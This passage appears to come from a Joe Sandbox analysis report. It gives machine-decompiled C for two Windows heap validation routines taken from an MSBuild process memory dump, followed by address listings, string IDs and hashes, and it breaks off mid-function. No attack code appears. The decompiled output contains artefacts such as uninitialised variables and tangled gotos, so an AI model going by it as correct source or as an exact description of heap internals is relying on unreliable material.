                                            C-Code - Quality: 56%
                                            			E010C4496(signed int* __ecx, void* __edx) {
                                            				signed int _v5;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed char _v24;
                                            				signed int* _v28;
                                            				char _v32;
                                            				signed int* _v36;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t150;
                                            				intOrPtr _t151;
                                            				signed char _t156;
                                            				intOrPtr _t157;
                                            				unsigned int _t169;
                                            				intOrPtr _t170;
                                            				signed int* _t183;
                                            				signed char _t184;
                                            				intOrPtr _t191;
                                            				signed int _t201;
                                            				intOrPtr _t203;
                                            				intOrPtr _t212;
                                            				intOrPtr _t220;
                                            				signed int _t230;
                                            				signed int _t241;
                                            				signed int _t244;
                                            				void* _t259;
                                            				signed int _t260;
                                            				signed int* _t261;
                                            				intOrPtr* _t262;
                                            				signed int _t263;
                                            				signed int* _t264;
                                            				signed int _t267;
                                            				signed int* _t268;
                                            				void* _t270;
                                            				void* _t281;
                                            				signed short _t285;
                                            				signed short _t289;
                                            				signed int _t291;
                                            				signed int _t298;
                                            				signed char _t303;
                                            				signed char _t308;
                                            				signed int _t314;
                                            				intOrPtr _t317;
                                            				unsigned int _t319;
                                            				signed int* _t325;
                                            				signed int _t326;
                                            				signed int _t327;
                                            				intOrPtr _t328;
                                            				signed int _t329;
                                            				signed int _t330;
                                            				signed int* _t331;
                                            				signed int _t332;
                                            				signed int _t350;
                                            
                                            				_t259 = __edx;
                                            				_t331 = __ecx;
                                            				_v28 = __ecx;
                                            				_v20 = 0;
                                            				_v12 = 0;
                                            				_t150 = E010C49A4(__ecx);
                                            				_t267 = 1;
                                            				if(_t150 == 0) {
                                            					L61:
                                            					_t151 =  *[fs:0x30];
                                            					__eflags =  *((char*)(_t151 + 2));
                                            					if( *((char*)(_t151 + 2)) != 0) {
                                            						 *0x10f6378 = _t267;
                                            						asm("int3");
                                            						 *0x10f6378 = 0;
                                            					}
                                            					__eflags = _v12;
                                            					if(_v12 != 0) {
                                            						_t105 =  &_v16;
                                            						 *_t105 = _v16 & 0x00000000;
                                            						__eflags =  *_t105;
                                            						E0103174B( &_v12,  &_v16, 0x8000);
                                            					}
                                            					L65:
                                            					__eflags = 0;
                                            					return 0;
                                            				}
                                            				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                            					_t268 =  &(_t331[0x30]);
                                            					_v32 = 0;
                                            					_t260 =  *_t268;
                                            					_t308 = 0;
                                            					_v24 = 0;
                                            					while(_t268 != _t260) {
                                            						_t260 =  *_t260;
                                            						_v16 =  *_t325 & 0x0000ffff;
                                            						_t156 = _t325[0];
                                            						_v28 = _t325;
                                            						_v5 = _t156;
                                            						__eflags = _t156 & 0x00000001;
                                            						if((_t156 & 0x00000001) != 0) {
                                            							_t157 =  *[fs:0x30];
                                            							__eflags =  *(_t157 + 0xc);
                                            							if( *(_t157 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_t325);
                                            							E0100B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                            							L32:
                                            							_t270 = 0;
                                            							__eflags = _t331[0x13];
                                            							if(_t331[0x13] != 0) {
                                            								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                            							}
                                            							L60:
                                            							_t267 = _t270 + 1;
                                            							__eflags = _t267;
                                            							goto L61;
                                            						}
                                            						_t169 =  *_t325 & 0x0000ffff;
                                            						__eflags = _t169 - _t308;
                                            						if(_t169 < _t308) {
                                            							_t170 =  *[fs:0x30];
                                            							__eflags =  *(_t170 + 0xc);
                                            							if( *(_t170 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							E0100B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                            							goto L32;
                                            						} else {
                                            							__eflags = _t331[0x13];
                                            							_t308 = _t169;
                                            							_v24 = _t308;
                                            							if(_t331[0x13] != 0) {
                                            								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                            								__eflags =  *_t325;
                                            							}
                                            							_t26 =  &_v32;
                                            							 *_t26 = _v32 + 1;
                                            							__eflags =  *_t26;
                                            							continue;
                                            						}
                                            					}
                                            					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                            					if( *0x10f6350 != 0 && _t331[0x2f] != 0) {
                                            						_push(4);
                                            						_push(0x1000);
                                            						_push( &_v16);
                                            						_push(0);
                                            						_push( &_v12);
                                            						_push(0xffffffff);
                                            						if(E01049660() >= 0) {
                                            							_v20 = _v12 + 0x204;
                                            						}
                                            					}
                                            					_t183 =  &(_t331[0x27]);
                                            					_t281 = 0x81;
                                            					_t326 =  *_t183;
                                            					if(_t183 == _t326) {
                                            						L49:
                                            						_t261 =  &(_t331[0x29]);
                                            						_t184 = 0;
                                            						_t327 =  *_t261;
                                            						_t282 = 0;
                                            						_v24 = 0;
                                            						_v36 = 0;
                                            						__eflags = _t327 - _t261;
                                            						if(_t327 == _t261) {
                                            							L53:
                                            							_t328 = _v32;
                                            							_v28 = _t331;
                                            							__eflags = _t328 - _t184;
                                            							if(_t328 == _t184) {
                                            								__eflags = _t331[0x1d] - _t282;
                                            								if(_t331[0x1d] == _t282) {
                                            									__eflags = _v12;
                                            									if(_v12 == 0) {
                                            										L82:
                                            										_t267 = 1;
                                            										__eflags = 1;
                                            										goto L83;
                                            									}
                                            									_t329 = _t331[0x2f];
                                            									__eflags = _t329;
                                            									if(_t329 == 0) {
                                            										L77:
                                            										_t330 = _t331[0x22];
                                            										__eflags = _t330;
                                            										if(_t330 == 0) {
                                            											L81:
                                            											_t129 =  &_v16;
                                            											 *_t129 = _v16 & 0x00000000;
                                            											__eflags =  *_t129;
                                            											E0103174B( &_v12,  &_v16, 0x8000);
                                            											goto L82;
                                            										}
                                            										_t314 = _t331[0x21] & 0x0000ffff;
                                            										_t285 = 1;
                                            										__eflags = 1 - _t314;
                                            										if(1 >= _t314) {
                                            											goto L81;
                                            										} else {
                                            											goto L79;
                                            										}
                                            										while(1) {
                                            											L79:
                                            											_t330 = _t330 + 0x40;
                                            											_t332 = _t285 & 0x0000ffff;
                                            											_t262 = _v20 + _t332 * 4;
                                            											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                            											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                            												break;
                                            											}
                                            											_t285 = _t285 + 1;
                                            											__eflags = _t285 - _t314;
                                            											if(_t285 < _t314) {
                                            												continue;
                                            											}
                                            											goto L81;
                                            										}
                                            										_t191 =  *[fs:0x30];
                                            										__eflags =  *(_t191 + 0xc);
                                            										if( *(_t191 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E0100B150();
                                            										} else {
                                            											E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push(_t262);
                                            										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                            										_t148 = _t330 + 0x10; // 0x10
                                            										_push( *((intOrPtr*)(_t330 + 8)));
                                            										E0100B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                            										L59:
                                            										_t270 = 0;
                                            										__eflags = 0;
                                            										goto L60;
                                            									}
                                            									_t289 = 1;
                                            									__eflags = 1;
                                            									while(1) {
                                            										_t201 = _v12;
                                            										_t329 = _t329 + 0xc;
                                            										_t263 = _t289 & 0x0000ffff;
                                            										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                            										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                            											break;
                                            										}
                                            										_t289 = _t289 + 1;
                                            										__eflags = _t289 - 0x81;
                                            										if(_t289 < 0x81) {
                                            											continue;
                                            										}
                                            										goto L77;
                                            									}
                                            									_t203 =  *[fs:0x30];
                                            									__eflags =  *(_t203 + 0xc);
                                            									if( *(_t203 + 0xc) == 0) {
                                            										_push("HEAP: ");
                                            										E0100B150();
                                            									} else {
                                            										E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									}
                                            									_t291 = _v12;
                                            									_push(_t291 + _t263 * 4);
                                            									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                            									_push( *((intOrPtr*)(_t329 + 8)));
                                            									E0100B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                            									goto L59;
                                            								}
                                            								_t212 =  *[fs:0x30];
                                            								__eflags =  *(_t212 + 0xc);
                                            								if( *(_t212 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(_t331[0x1d]);
                                            								_push(_v36);
                                            								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                            								L58:
                                            								E0100B150();
                                            								goto L59;
                                            							}
                                            							_t220 =  *[fs:0x30];
                                            							__eflags =  *(_t220 + 0xc);
                                            							if( *(_t220 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_t328);
                                            							_push(_v24);
                                            							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                            							goto L58;
                                            						} else {
                                            							goto L50;
                                            						}
                                            						while(1) {
                                            							L50:
                                            							_t92 = _t327 - 0x10; // -24
                                            							_t282 = _t331;
                                            							_t230 = E010C4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                            							__eflags = _t230;
                                            							if(_t230 == 0) {
                                            								goto L59;
                                            							}
                                            							_t327 =  *_t327;
                                            							__eflags = _t327 - _t261;
                                            							if(_t327 != _t261) {
                                            								continue;
                                            							}
                                            							_t184 = _v24;
                                            							_t282 = _v36;
                                            							goto L53;
                                            						}
                                            						goto L59;
                                            					} else {
                                            						while(1) {
                                            							_t39 = _t326 + 0x18; // 0x10
                                            							_t264 = _t39;
                                            							if(_t331[0x13] != 0) {
                                            								_t319 = _t331[0x14] ^  *_t264;
                                            								 *_t264 = _t319;
                                            								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                            								_t348 = _t319 >> 0x18 - _t303;
                                            								if(_t319 >> 0x18 != _t303) {
                                            									_push(_t303);
                                            									E010BFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                            								}
                                            								_t281 = 0x81;
                                            							}
                                            							_t317 = _v20;
                                            							if(_t317 != 0) {
                                            								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                            								_t350 = _t241;
                                            								if(_t350 != 0) {
                                            									if(_t350 >= 0) {
                                            										__eflags = _t241 & 0x00000800;
                                            										if(__eflags == 0) {
                                            											__eflags = _t241 - _t331[0x21];
                                            											if(__eflags < 0) {
                                            												_t298 = _t241;
                                            												_t65 = _t317 + _t298 * 4;
                                            												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                            												__eflags =  *_t65;
                                            											}
                                            										}
                                            									} else {
                                            										_t244 = _t241 & 0x00007fff;
                                            										if(_t244 < _t281) {
                                            											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                            										}
                                            									}
                                            								}
                                            							}
                                            							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E010B23E3(_t331, _t264) == 0) {
                                            								break;
                                            							}
                                            							if(_t331[0x13] != 0) {
                                            								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                            								 *_t264 =  *_t264 ^ _t331[0x14];
                                            							}
                                            							_t326 =  *_t326;
                                            							if( &(_t331[0x27]) == _t326) {
                                            								goto L49;
                                            							} else {
                                            								_t281 = 0x81;
                                            								continue;
                                            							}
                                            						}
                                            						__eflags = _t331[0x13];
                                            						if(_t331[0x13] != 0) {
                                            							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                            							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                            						}
                                            						goto L65;
                                            					}
                                            				} else {
                                            					L83:
                                            					return _t267;
                                            				}
                                            			}



























































                                            0x010c44a1
                                            0x010c44a3
                                            0x010c44a7
                                            0x010c44ac
                                            0x010c44af
                                            0x010c44b2
                                            0x010c44b9
                                            0x010c44bc
                                            0x010c47f2
                                            0x010c47f2
                                            0x010c47f8
                                            0x010c47fc
                                            0x010c47fe
                                            0x010c4804
                                            0x010c4805
                                            0x010c4805
                                            0x010c480c
                                            0x010c4810
                                            0x010c4812
                                            0x010c4812
                                            0x010c4812
                                            0x010c4822
                                            0x010c4822
                                            0x010c4827
                                            0x010c4827
                                            0x00000000
                                            0x010c4827
                                            0x010c44c4
                                            0x010c44d3
                                            0x010c44d9
                                            0x010c44dc
                                            0x010c44de
                                            0x010c44e0
                                            0x010c4560
                                            0x010c4520
                                            0x010c4522
                                            0x010c4525
                                            0x010c4528
                                            0x010c452b
                                            0x010c452e
                                            0x010c4530
                                            0x010c4697
                                            0x010c469d
                                            0x010c46a1
                                            0x010c46c0
                                            0x010c46c5
                                            0x010c46a3
                                            0x010c46b8
                                            0x010c46bd
                                            0x010c46cb
                                            0x010c46d4
                                            0x010c4677
                                            0x010c4677
                                            0x010c4679
                                            0x010c467c
                                            0x010c468a
                                            0x010c4690
                                            0x010c4690
                                            0x010c47f1
                                            0x010c47f1
                                            0x010c47f1
                                            0x00000000
                                            0x010c47f1
                                            0x010c4536
                                            0x010c4539
                                            0x010c453c
                                            0x010c4636
                                            0x010c463c
                                            0x010c4640
                                            0x010c465f
                                            0x010c4664
                                            0x010c4642
                                            0x010c4657
                                            0x010c465c
                                            0x010c4670
                                            0x00000000
                                            0x010c4542
                                            0x010c4542
                                            0x010c4546
                                            0x010c4548
                                            0x010c454b
                                            0x010c4555
                                            0x010c455b
                                            0x010c455b
                                            0x010c455b
                                            0x010c455d
                                            0x010c455d
                                            0x010c455d
                                            0x00000000
                                            0x010c455d
                                            0x010c453c
                                            0x010c4579
                                            0x010c457c
                                            0x010c4587
                                            0x010c4589
                                            0x010c4591
                                            0x010c4592
                                            0x010c4597
                                            0x010c4598
                                            0x010c45a1
                                            0x010c45ab
                                            0x010c45ab
                                            0x010c45a1
                                            0x010c45ae
                                            0x010c45b4
                                            0x010c45b9
                                            0x010c45bd
                                            0x010c4759
                                            0x010c4759
                                            0x010c475f
                                            0x010c4761
                                            0x010c4763
                                            0x010c4765
                                            0x010c4768
                                            0x010c476b
                                            0x010c476d
                                            0x010c479c
                                            0x010c479c
                                            0x010c479f
                                            0x010c47a2
                                            0x010c47a4
                                            0x010c4830
                                            0x010c4833
                                            0x010c4879
                                            0x010c487d
                                            0x010c48f1
                                            0x010c48f3
                                            0x010c48f3
                                            0x00000000
                                            0x010c48f3
                                            0x010c487f
                                            0x010c4885
                                            0x010c4887
                                            0x010c48a8
                                            0x010c48a8
                                            0x010c48ae
                                            0x010c48b0
                                            0x010c48dc
                                            0x010c48dc
                                            0x010c48dc
                                            0x010c48dc
                                            0x010c48ec
                                            0x00000000
                                            0x010c48ec
                                            0x010c48b2
                                            0x010c48bc
                                            0x010c48be
                                            0x010c48c1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c48c3
                                            0x010c48c3
                                            0x010c48c6
                                            0x010c48c9
                                            0x010c48cc
                                            0x010c48d1
                                            0x010c48d4
                                            0x00000000
                                            0x00000000
                                            0x010c48d6
                                            0x010c48d7
                                            0x010c48da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c48da
                                            0x010c494f
                                            0x010c4955
                                            0x010c4959
                                            0x010c4978
                                            0x010c497d
                                            0x010c495b
                                            0x010c4970
                                            0x010c4975
                                            0x010c4986
                                            0x010c4987
                                            0x010c498a
                                            0x010c498d
                                            0x010c4997
                                            0x010c47ef
                                            0x010c47ef
                                            0x010c47ef
                                            0x00000000
                                            0x010c47ef
                                            0x010c4890
                                            0x010c4890
                                            0x010c4891
                                            0x010c4891
                                            0x010c4894
                                            0x010c4897
                                            0x010c489d
                                            0x010c48a0
                                            0x00000000
                                            0x00000000
                                            0x010c48a2
                                            0x010c48a3
                                            0x010c48a6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c48a6
                                            0x010c48fb
                                            0x010c4901
                                            0x010c4905
                                            0x010c4924
                                            0x010c4929
                                            0x010c4907
                                            0x010c491c
                                            0x010c4921
                                            0x010c492f
                                            0x010c4935
                                            0x010c4936
                                            0x010c4939
                                            0x010c4942
                                            0x00000000
                                            0x010c4947
                                            0x010c4835
                                            0x010c483b
                                            0x010c483f
                                            0x010c485e
                                            0x010c4863
                                            0x010c4841
                                            0x010c4856
                                            0x010c485b
                                            0x010c4869
                                            0x010c486c
                                            0x010c486f
                                            0x010c47e7
                                            0x010c47e7
                                            0x00000000
                                            0x010c47ec
                                            0x010c47aa
                                            0x010c47b0
                                            0x010c47b4
                                            0x010c47d3
                                            0x010c47d8
                                            0x010c47b6
                                            0x010c47cb
                                            0x010c47d0
                                            0x010c47de
                                            0x010c47df
                                            0x010c47e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c476f
                                            0x010c476f
                                            0x010c4778
                                            0x010c4785
                                            0x010c4787
                                            0x010c478c
                                            0x010c478e
                                            0x00000000
                                            0x00000000
                                            0x010c4790
                                            0x010c4792
                                            0x010c4794
                                            0x00000000
                                            0x00000000
                                            0x010c4796
                                            0x010c4799
                                            0x00000000
                                            0x010c4799
                                            0x00000000
                                            0x010c45c3
                                            0x010c45c3
                                            0x010c45c7
                                            0x010c45c7
                                            0x010c45ca
                                            0x010c45cf
                                            0x010c45d3
                                            0x010c45df
                                            0x010c45e4
                                            0x010c45e6
                                            0x010c45e8
                                            0x010c45ed
                                            0x010c45ed
                                            0x010c45f2
                                            0x010c45f2
                                            0x010c45f7
                                            0x010c45fc
                                            0x010c4602
                                            0x010c4606
                                            0x010c4609
                                            0x010c460f
                                            0x010c46de
                                            0x010c46e3
                                            0x010c46e5
                                            0x010c46ec
                                            0x010c46ee
                                            0x010c46f6
                                            0x010c46f6
                                            0x010c46f6
                                            0x010c46f6
                                            0x010c46ec
                                            0x010c4615
                                            0x010c4615
                                            0x010c461d
                                            0x010c462e
                                            0x010c462e
                                            0x010c461d
                                            0x010c460f
                                            0x010c4609
                                            0x010c46fd
                                            0x00000000
                                            0x00000000
                                            0x010c4710
                                            0x010c471a
                                            0x010c4720
                                            0x010c4720
                                            0x010c4722
                                            0x010c472c
                                            0x00000000
                                            0x010c472e
                                            0x010c472e
                                            0x00000000
                                            0x010c472e
                                            0x010c472c
                                            0x010c4738
                                            0x010c473c
                                            0x010c474b
                                            0x010c4751
                                            0x010c4751
                                            0x00000000
                                            0x010c473c
                                            0x010c48f4
                                            0x010c48f4
                                            0x00000000
                                            0x010c48f4

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                            • API String ID: 0-1357697941
                                            • Opcode ID: 214c328c7bd9edbaeb56db5189bd1b83387a63e3f0f273b42b9f5743623e729b
                                            • Instruction ID: 1f5a6e6943bbac219a6d976d9f7511ed0b935143aaf6d4b25b44001ec6610b56
                                            • Opcode Fuzzy Hash: 214c328c7bd9edbaeb56db5189bd1b83387a63e3f0f273b42b9f5743623e729b
                                            • Instruction Fuzzy Hash: 7BF1FE31A00646DFEB25CBA8C4A0BAEBBF1FF59B04F04816DE186D7681C734A949CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0102A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                            				char _v8;
                                            				signed short _v12;
                                            				signed short _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				unsigned int _v52;
                                            				signed int _v56;
                                            				void* _v60;
                                            				intOrPtr _v64;
                                            				void* _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				unsigned int _t246;
                                            				signed char _t247;
                                            				signed short _t249;
                                            				unsigned int _t256;
                                            				signed int _t262;
                                            				signed int _t265;
                                            				signed int _t266;
                                            				signed int _t267;
                                            				intOrPtr _t270;
                                            				signed int _t280;
                                            				signed int _t286;
                                            				signed int _t289;
                                            				intOrPtr _t290;
                                            				signed int _t291;
                                            				signed int _t317;
                                            				signed short _t320;
                                            				intOrPtr _t327;
                                            				signed int _t339;
                                            				signed int _t344;
                                            				signed int _t347;
                                            				intOrPtr _t348;
                                            				signed int _t350;
                                            				signed int _t352;
                                            				signed int _t353;
                                            				signed int _t356;
                                            				intOrPtr _t357;
                                            				intOrPtr _t366;
                                            				signed int _t367;
                                            				signed int _t370;
                                            				intOrPtr _t371;
                                            				signed int _t372;
                                            				signed int _t394;
                                            				signed short _t402;
                                            				intOrPtr _t404;
                                            				intOrPtr _t415;
                                            				signed int _t430;
                                            				signed int _t433;
                                            				signed int _t437;
                                            				signed int _t445;
                                            				signed short _t446;
                                            				signed short _t449;
                                            				signed short _t452;
                                            				signed int _t455;
                                            				signed int _t460;
                                            				signed short* _t468;
                                            				signed int _t480;
                                            				signed int _t481;
                                            				signed int _t483;
                                            				intOrPtr _t484;
                                            				signed int _t491;
                                            				unsigned int _t506;
                                            				unsigned int _t508;
                                            				signed int _t513;
                                            				signed int _t514;
                                            				signed int _t521;
                                            				signed short* _t533;
                                            				signed int _t541;
                                            				signed int _t543;
                                            				signed int _t546;
                                            				unsigned int _t551;
                                            				signed int _t553;
                                            
                                            				_t450 = __ecx;
                                            				_t553 = __ecx;
                                            				_t539 = __edx;
                                            				_v28 = 0;
                                            				_v40 = 0;
                                            				if(( *(__ecx + 0xcc) ^  *0x10f8a68) != 0) {
                                            					_push(_a4);
                                            					_t513 = __edx;
                                            					L11:
                                            					_t246 = E0102A830(_t450, _t513);
                                            					L7:
                                            					return _t246;
                                            				}
                                            				if(_a8 != 0) {
                                            					__eflags =  *(__edx + 2) & 0x00000008;
                                            					if(( *(__edx + 2) & 0x00000008) != 0) {
                                            						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                            						_t430 = E0102DF24(__edx,  &_v12,  &_v16);
                                            						__eflags = _t430;
                                            						if(_t430 != 0) {
                                            							_t157 = _t553 + 0x234;
                                            							 *_t157 =  *(_t553 + 0x234) - _v16;
                                            							__eflags =  *_t157;
                                            						}
                                            					}
                                            					_t445 = _a4;
                                            					_t514 = _t539;
                                            					_v48 = _t539;
                                            					L14:
                                            					_t247 =  *((intOrPtr*)(_t539 + 6));
                                            					__eflags = _t247;
                                            					if(_t247 == 0) {
                                            						_t541 = _t553;
                                            					} else {
                                            						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                            						__eflags = _t541;
                                            					}
                                            					_t249 = 7 + _t445 * 8 + _t514;
                                            					_v12 = _t249;
                                            					__eflags =  *_t249 - 3;
                                            					if( *_t249 == 3) {
                                            						_v16 = _t514 + _t445 * 8 + 8;
                                            						E01009373(_t553, _t514 + _t445 * 8 + 8);
                                            						_t452 = _v16;
                                            						_v28 =  *(_t452 + 0x10);
                                            						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                            						_v36 =  *(_t452 + 0x14);
                                            						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                            						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                            						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                            						_t256 =  *(_t452 + 0x14);
                                            						__eflags = _t256 - 0x7f000;
                                            						if(_t256 >= 0x7f000) {
                                            							_t142 = _t553 + 0x1ec;
                                            							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                            							__eflags =  *_t142;
                                            							_t256 =  *(_t452 + 0x14);
                                            						}
                                            						_t513 = _v48;
                                            						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                            						_a4 = _t445;
                                            						_v40 = 1;
                                            					} else {
                                            						_t27 =  &_v36;
                                            						 *_t27 = _v36 & 0x00000000;
                                            						__eflags =  *_t27;
                                            					}
                                            					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                            					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                            						_v44 = _t513;
                                            						_t262 = E0100A9EF(_t541, _t513);
                                            						__eflags = _a8;
                                            						_v32 = _t262;
                                            						if(_a8 != 0) {
                                            							__eflags = _t262;
                                            							if(_t262 == 0) {
                                            								goto L19;
                                            							}
                                            						}
                                            						__eflags =  *0x10f8748 - 1;
                                            						if( *0x10f8748 >= 1) {
                                            							__eflags = _t262;
                                            							if(_t262 == 0) {
                                            								_t415 =  *[fs:0x30];
                                            								__eflags =  *(_t415 + 0xc);
                                            								if( *(_t415 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push("(UCRBlock != NULL)");
                                            								E0100B150();
                                            								__eflags =  *0x10f7bc8;
                                            								if( *0x10f7bc8 == 0) {
                                            									__eflags = 1;
                                            									E010C2073(_t445, 1, _t541, 1);
                                            								}
                                            								_t513 = _v48;
                                            								_t445 = _a4;
                                            							}
                                            						}
                                            						_t350 = _v40;
                                            						_t480 = _t445 << 3;
                                            						_v20 = _t480;
                                            						_t481 = _t480 + _t513;
                                            						_v24 = _t481;
                                            						__eflags = _t350;
                                            						if(_t350 == 0) {
                                            							_t481 = _t481 + 0xfffffff0;
                                            							__eflags = _t481;
                                            						}
                                            						_t483 = (_t481 & 0xfffff000) - _v44;
                                            						__eflags = _t483;
                                            						_v52 = _t483;
                                            						if(_t483 == 0) {
                                            							__eflags =  *0x10f8748 - 1;
                                            							if( *0x10f8748 < 1) {
                                            								goto L9;
                                            							}
                                            							__eflags = _t350;
                                            							goto L146;
                                            						} else {
                                            							_t352 = E0103174B( &_v44,  &_v52, 0x4000);
                                            							__eflags = _t352;
                                            							if(_t352 < 0) {
                                            								goto L94;
                                            							}
                                            							_t353 = E01027D50();
                                            							_t447 = 0x7ffe0380;
                                            							__eflags = _t353;
                                            							if(_t353 != 0) {
                                            								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t356 = 0x7ffe0380;
                                            							}
                                            							__eflags =  *_t356;
                                            							if( *_t356 != 0) {
                                            								_t357 =  *[fs:0x30];
                                            								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                            								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                            									E010C14FB(_t447, _t553, _v44, _v52, 5);
                                            								}
                                            							}
                                            							_t358 = _v32;
                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                            							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                            							__eflags = _t484 - 0x7f000;
                                            							if(_t484 >= 0x7f000) {
                                            								_t90 = _t553 + 0x1ec;
                                            								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                            								__eflags =  *_t90;
                                            							}
                                            							E01009373(_t553, _t358);
                                            							_t486 = _v32;
                                            							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                            							E01009819(_t486);
                                            							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                            							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                            							_t366 =  *((intOrPtr*)(_v32 + 0x14));
